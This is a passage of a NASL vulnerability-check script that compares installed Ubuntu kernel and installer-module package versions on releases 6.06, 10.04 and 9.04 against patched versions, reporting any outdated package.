exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"jfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"loop-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-firmware-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ntfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"reiserfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ufs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-storage-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"xfs-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-309-ec2\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-309-ec2\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-25-386\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-25-generic-pae\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-25-generic\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-25-386\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-25-generic-pae\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-25-generic\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-25-virtual\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.32-25\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.32\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-309\", ver:\"2.6.32-309.18\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-25\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.32\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-25-generic-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-25-generic-pae-di\", ver:\"2.6.32-25.45\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-19-generic\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-19-server\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-19-generic\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-19-server\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-19-virtual\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.28\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-19\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.28\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.28-19-generic-di\", ver:\"2.6.28-19.66\", 